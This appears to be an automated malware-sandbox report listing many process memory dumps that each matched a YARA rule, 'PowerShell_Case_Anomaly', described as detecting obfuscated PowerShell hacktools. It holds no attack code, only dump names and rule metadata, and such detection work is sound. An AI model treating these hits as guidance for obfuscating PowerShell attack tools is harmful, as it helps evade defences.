Source: 0000000D.00000000.16298887951.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000000.16299447192.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000000.16300196558.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000000.16300331558.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000002.16300827017.00080000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000002.16301298263.002E0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000002.16301400720.00306000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000D.00000003.16300533489.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000E.00000002.16532104215.01210000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000E.00000002.16532260705.01300000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000E.00000002.16532283238.01307000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000E.00000002.16538668028.044ED000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000000.16423513415.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000000.16423696288.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000000.16424010643.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000000.16424296226.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000002.16425519548.002F0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000002.16425863355.005E0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000013.00000003.16424469175.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000000.16427157568.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000000.16427626069.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000000.16427801984.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000000.16427909144.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000002.16428253744.00086000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000002.16428237813.00060000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000002.16428345115.002F0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000014.00000003.16428100823.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000015.00000000.16435013085.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000015.00000000.16435224699.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000015.00000000.16434819215.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000015.00000000.16435443949.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000015.00000003.16435713321.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000016.00000002.16550395399.00260000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000016.00000002.16550953531.00530000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000017.00000002.16557924955.01C50000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000016.00000003.16441425216.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000016.00000000.16440999829.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000000.16453096494.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000000.16453674876.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000000.16453891780.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000002.16455102821.000E0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000002.16455015171.000B0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000003.16454255633.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000018.00000000.16453553931.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000000.16458141609.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000000.16458311882.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000000.16458528912.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000000.16458843270.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000002.16459856147.00160000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000002.16459880486.00186000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000002.16459967558.003A0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001A.00000003.16459226751.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000000.16460451553.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000000.16460674878.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000000.16460822174.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000000.16461111447.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16468544452.00110000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16470994291.0153D000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16471109913.01660000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16471226487.016C0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16469158345.004B1000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16468815770.003E0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000002.16468838264.00406000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16461517453.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16465931308.0011C000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16468242022.004B0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16468174726.004A5000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16468191650.004AC000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001C.00000000.16466455838.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16468206147.00481000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001C.00000002.16480249069.00400000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001C.00000002.16480203790.003E0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001C.00000002.16480269231.00426000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001C.00000003.16466700886.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000000.16472465532.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000000.16472603519.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000000.16472892522.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000000.16472742485.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001B.00000003.16468140620.004B2000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000002.16473840713.00340000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000002.16473711541.00270000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000002.16473904470.00366000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001E.00000000.16475070317.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001E.00000000.16475268349.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001D.00000003.16473177431.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001E.00000000.16474820967.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001E.00000000.16474461723.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000001E.00000003.16476187232.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000000.16499978274.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000000.16500170033.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000000.16500483468.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000002.16567553929.00321000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000002.16567604876.004A0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000002.16567440908.002D0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000002.16567501646.0030F000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16501342355.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000002.16567480851.002FF000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16503064468.0030C000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16503079730.0030F000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000000.16500917401.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16503118310.00306000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16503179760.002D1000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16506373335.00327000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16503265026.002F9000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16506450727.0031C000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16506487131.0030F000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16503292449.00300000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000021.00000003.16507436398.002FD000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000000.16503997937.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000000.16505979814.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000000.16503831032.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000000.16505682606.00010000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000002.16571554431.00098000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000002.16571520029.00070000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000002.16571590847.000AF000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000023.00000002.16571752140.00440000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
